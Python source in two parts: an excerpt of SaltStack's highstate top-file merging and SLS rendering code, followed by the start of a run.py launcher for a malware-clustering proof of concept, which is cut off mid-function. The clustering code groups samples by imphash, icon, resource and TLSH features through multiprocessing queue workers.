envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
# Include's or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
# Is this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
# if we did not found any sls in the fileserver listing, this
# may be because the sls was generated or added later, we can
# try to directly execute it, and if it fails, anyway it will
# return the former error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
run.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
run - a script used for launching the PoC.
See README.md and help (./run -h) for details on usage.
Part of D&C-Clustering-POC
Copyright (c) 2020 Sturla Høgdahl Bae
"""
import argparse
import configparser
import multiprocessing
import os
import pickle
import queue
import time
from multiprocessing.managers import BaseManager
import clustering
import feature_extraction
# Data structure for storing files
files = {}
clusters = {
'imphash_clusters': {},
'icon_clusters': {},
'resource_clusters': {},
'tlsh_clusters': {}
}
# Retreive configuration
config = configparser.ConfigParser()
config.read('config.ini')
PRINT_PROGRESS = config.getboolean('general', 'print_progress')
QUEUE_MANAGER_IP = config.get('queue_managers', 'ip')
JOB_MANAGER_PORT = config.getint('queue_managers', 'job_port')
DONE_MANAGER_PORT = config.getint('queue_managers', 'done_port')
QUEUE_MANAGER_KEY = config.get('queue_managers', 'key').encode('utf-8')
QUEUE_TIMEOUT = config.getint('queue_managers', 'timeout')
CLUSTER_WITH_VHASH = config.getboolean('clustering', 'cluster_with_vhash')
if CLUSTER_WITH_VHASH:
clusters['vhash_clusters'] = {}
# Define queue manager class
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue')
def serve_simple_queue(ip, port, key):
"""
Start a queue on the specified port
Start as new thread/process as the function will run "serve_forever()".
"""
simple_queue = queue.Queue()
QueueManager.register('get_queue', callable=lambda:simple_queue)
manager = QueueManager(address=(ip, port), authkey=key)
server = manager.get_server()
server.serve_forever()
def feature_extraction_worker(training=False):
"""
Connect to feature extraction (job) queue and clustering (job done) queue
If training is True, the file will be marked as being part of the training data set.
"""
job_manager = QueueManager(address=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
done_manager = QueueManager(address=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try:
job_manager.connect()
done_manager.connect()
except:
print("Cannot connect to queue manager. Please check the configuration.")
else:
job_queue = job_manager.get_queue()
done_queue = done_manager.get_queue()
while True:
try:
file_to_cluster = job_queue.get(timeout=QUEUE_TIMEOUT)
except EOFError:
print("Queue not available. Please check if the feature extraction queue manager is still running.")
break
except queue.Empty:
# Stop when queue is empty
break
else:
result = feature_extraction.analyse_file(file_to_cluster['path'], family=file_to_cluster['family'], incoming=True, training=training)
send_to_done_queue(result, done_queue)
def send_to_done_queue(fileinfo, done_queue):
"""
Recursively send files to the queue of
completed feature extraction jobs
"""
if fileinfo is not None:
for contained_info in fileinfo['contained_pe_fileinfo'].values():
send_to_done_queue(contained_info, done_queue)
fileinfo.pop('contained_pe_fileinfo')
done_queue.put(fileinfo)
def add_files_for_extraction(*file_list):
"""
Add files to the queue of files that should have their
features extracted and their data sent to clustering
"""
job_manager = QueueManager(address=(QUEUE_MANAGER_IP, JOB_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try: # Connect to feature extraction queue
job_manager.connect()
except:
print("Cannot connect to queue manager. Make sure the daemon is running and the configuration is correct.")
else:
job_queue = job_manager.get_queue()
for item in file_list:
# Send all files in the list to the feature extraction queue
job_queue.put(item)
def get_done_queue():
"""
Retrieve a queue object from a queue manager created
with the options provided in the config file.
"""
done_manager = QueueManager(address=(QUEUE_MANAGER_IP, DONE_MANAGER_PORT), authkey=QUEUE_MANAGER_KEY)
try:
done_manager.connect()
except:
print("Cannot connect to queue manager. Please try again or check the configuration.")
raise SystemExit
return done_manager.get_queue()
def get_fileinfo_from_done_queue(done_queue):
"""
Returns one fileinfo/file feature dictionary from
the provided queue object.
"""
try:
# Return file metadata the done queue
return done_queue.get(timeout=QUEUE_TIMEOUT)
except EOFError:
print("Queue not available. Please check if the queue manager is still running.")
return None
except queue.Empty:
if PRINT_PROGRESS:
print("Done-queue empty. Stopping collection.")
return None
def collect_features(files):
"""
Retrieve fileinfo/file feature dictionaries from the
feature extraction workers and store the feature
information in the global "files" data structure.
"""
incoming_files_parsed = 0
done_queue = get_done_queue()
# Attempt to retrieve a file from the done queue
fileinfo = get_fileinfo_from_done_queue(done_queue)
# Continue while it is possible to retrieve a file
while fileinfo is not None:
fileinfo['training'] = True
if fileinfo['incoming']:
incoming_files_parsed += 1
if PRINT_PROGRESS:
